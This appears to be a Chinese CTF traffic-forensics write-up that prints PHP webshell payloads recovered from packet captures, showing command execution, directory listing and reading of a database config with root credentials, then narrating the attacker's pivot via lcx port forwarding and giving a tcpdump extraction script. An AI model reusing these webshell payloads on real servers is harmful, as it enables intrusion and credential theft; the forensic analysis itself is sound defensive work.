@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/include/;whoami;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行命令 whoami
www-data
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;uname -a;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行命令 uname -a
Linux localhost 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ipconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行命令 : pwd
/var/www/html/uploadfile/2017/0905
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ifconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行命令 ifconfig
ens33 Link encap:Ethernet HWaddr 00:0c:29:da:d6:4e
inet addr:192.168.20.88 Bcast:192.168.20.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:feda:d64e/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:150300 errors:0 dropped:0 overruns:0 frame:0
TX packets:49841 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:162871217 (162.8 MB) TX bytes:5569466 (5.5 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:227 errors:0 dropped:0 overruns:0 frame:0
TX packets:227 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:20038 (20.0 KB) TX bytes:20038 (20.0 KB)
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件
ERROR:// Path Not Found Or No Permission!
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/ 下的所有文件
./ 2017-09-03 03:30:49 4096 0755
html/ 2017-09-03 03:38:34 4096 0777
../ 2017-09-03 00:57:48 4096 0755
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/ 下的所有文件
phpsso_server/ 2017-09-03 03:31:30 4096 0777
api/ 2017-09-03 03:31:44 4096 0777
statics/ 2017-09-03 03:31:44 4096 0777
caches/ 2017-09-03 03:45:14 4096 0777
./ 2017-09-03 03:38:34 4096 0777
html/ 2017-09-03 03:37:50 4096 0777
phpcms/ 2017-09-03 03:31:27 4096 0777
../ 2017-09-03 03:30:49 4096 0755
uploadfile/ 2017-09-05 02:25:38 4096 0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php 2017-09-03 03:31:44 3593 0777
favicon.ico 2017-09-03 03:31:44 3158 0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php 2017-09-03 03:31:44 48 0777
robots.txt 2017-09-03 03:31:44 170 0777
index.php 2017-09-03 03:31:44 313 0777
index.html 2017-09-05 00:13:08 9578 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/ 下的所有文件
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/phpcms/ 下的所有文件
./ 2017-09-03 03:31:16 4096 0777
classes/ 2017-09-03 03:31:16 4096 0777
data/ 2017-09-03 03:31:16 4096 0777
../ 2017-09-03 03:31:27 4096 0777
functions/ 2017-09-03 03:31:16 4096 0777
index.html 2017-09-03 03:31:16 1 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/phpcms/libs/ 下的所有文件
./ 2017-09-03 03:31:16 4096 0777
classes/ 2017-09-03 03:31:16 4096 0777
data/ 2017-09-03 03:31:16 4096 0777
../ 2017-09-03 03:31:27 4096 0777
functions/ 2017-09-03 03:31:16 4096 0777
index.html 2017-09-03 03:31:16 1 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/data/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/phpcms/libs/data/ 下的所有文件
./ 2017-09-03 03:31:16 4096 0777
font/ 2017-09-03 03:31:16 4096 0777
../ 2017-09-03 03:31:16 4096 0777
ipdata/ 2017-09-03 03:31:16 4096 0777
dict/ 2017-09-03 03:31:16 4096 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件
ERROR:// Path Not Found Or No Permission!
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/caches/ 下的所有文件
caches_admin/ 2017-09-03 03:37:50 4096 0777
caches_content/ 2017-09-03 03:37:50 4096 0777
poster_js/ 2017-09-03 03:37:50 4096 0777
bakup/ 2017-09-03 03:37:50 4096 0777
caches_commons/ 2017-09-03 03:37:50 4096 0777
caches_tpl_data/ 2017-09-03 03:37:50 4096 0777
caches_linkage/ 2017-09-03 03:37:50 4096 0777
caches_model/ 2017-09-03 03:37:50 4096 0777
./ 2017-09-03 03:45:14 4096 0777
vote_js/ 2017-09-03 03:37:50 4096 0777
caches_search/ 2017-09-03 03:38:33 4096 0755
caches_scan/ 2017-09-03 03:37:50 4096 0777
caches_member/ 2017-09-03 03:37:50 4096 0777
sessions/ 2017-09-03 03:37:50 4096 0777
../ 2017-09-03 03:38:34 4096 0777
configs/ 2017-09-03 03:37:50 4096 0777
caches_template/ 2017-09-03 03:45:14 4096 0777
install.lock 2017-09-03 03:38:34 0 0644
error_log.php 2017-09-05 02:54:12 769 0644
index.html 2017-09-03 03:31:45 1 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/caches/configs/ 下的所有文件
./ 2017-09-03 03:37:50 4096 0777
../ 2017-09-03 03:45:14 4096 0777
ku6server.php 2017-09-03 03:31:45 208 0777
sub_config.php 2017-09-03 03:31:45 1376 0777
route.php 2017-09-03 03:31:45 803 0777
credit.php 2017-09-03 03:31:45 122 0777
cache.php 2017-09-03 03:31:45 330 0777
database.php 2017-09-03 03:38:32 324 0777
model_config.php 2017-09-03 03:31:45 52 0777
version.php 2017-09-03 03:31:45 118 0777
modules.php 2017-09-03 03:38:33 212 0777
ku6status_config.php 2017-09-03 03:31:45 781 0777
snda.php 2017-09-03 03:31:45 51 0777
system.php 2017-09-05 00:11:58 2430 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/database.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件 /var/www/html/caches/configs/database.php 内容
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="/var/www/html/caches/configs/database.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// 读取文件 /var/www/html/caches/configs/database.php 内容
array (
'hostname' => 'localhost',
'port' => 3306,
'database' => 'phpcmsv9',
'username' => 'root',
'password' => '123456',
'tablepre' => 'v9_',
'charset' => 'gbk',
'type' => 'mysqli',
'debug' => true,
'pconnect' => 0,
'autoconnect' => 0
),
);
?>
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/ 下的所有文件
攻击者的思路以及攻击流程也理清楚了
首先攻击者(172.16.10.110)通过一台可以访问到的 Windows 主机 192.168.20.117 (Dedecms) 拿到 webshell 以后
通过 lcx 将内网的主机 192.168.20.88 的 80 端口(phpcms)转发到 172.16.10.110 的 8888 端口
进一步利用漏洞拿到内网主机的权限
到这里 HTTP 层面的题目感觉应该已经分析的差不多了 , 只要拿到题目应该就可以直接填答案了
这道题目还提供了 ftp 的日志
应该还和 ftp 协议有关
#!/bin/bash
#ftp.sh
target_folder='ftp'
mkdir ${target_folder}
for file in `ls *.pcap`;
do
echo "Dumping ftp package in ${file}..."
tcpdump -A -s 0 'host 192.168.20.117 or host 192.168.20.248' -r $file -w ${target_folder}/${file}
echo "${file} Done!"
done
第四题_第11张图片](http://img.e-com-net.com/image/info10/052753d788a84b6499ec59b9a8d913be.jpg)
image.png
第四题_第12张图片](http://img.e-com-net.com/image/info10/9efddab3d41c45cba6f72169035fbf1e.jpg)
image.png
第四题_第13张图片](http://img.e-com-net.com/image/info10/9b128d862d4b4a7f924d2a15381e233b.jpg)
image.png
虽然有 FTP 的包 , 但是似乎并没有日志中的IP
有可能是我数据包拷贝的不全 ?